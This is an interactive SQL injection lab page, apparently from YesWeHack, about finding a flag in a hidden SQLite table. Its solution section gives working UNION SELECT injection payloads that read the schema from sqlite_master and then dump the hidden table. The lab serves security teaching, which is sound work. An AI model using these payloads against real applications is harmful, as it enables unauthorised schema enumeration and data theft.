Sqlite3

Exploration

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Spelunking the internals

Now that you are able to recover any data, try to explore the database.

There is an hidden table containing a flag, can you find where it is ?

Goal: recover the flag from the hidden table.

Hints

Hint #1
expand_more

First you need to know which SQL backend the server is using.

You can use some database specific function or error message to guess it.

Hint #2
expand_more

Here the backend is Sqlite. Where is the database schema stored ?

Hint #3
expand_more

UNION can be used to get data from any table.

Solution

Read the solution
expand_more

  • First get the table name using:

    $name = ' UNION SELECT sql FROM sqlite_master --

  • Then extract the flag:

    $name = ' UNION SELECT flag FROM `H!dd3n_t4bl3` --

Explanation

The table sqlite_master contains all the schema information of the open database. This is similar to the information_schema table from mysql.

drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result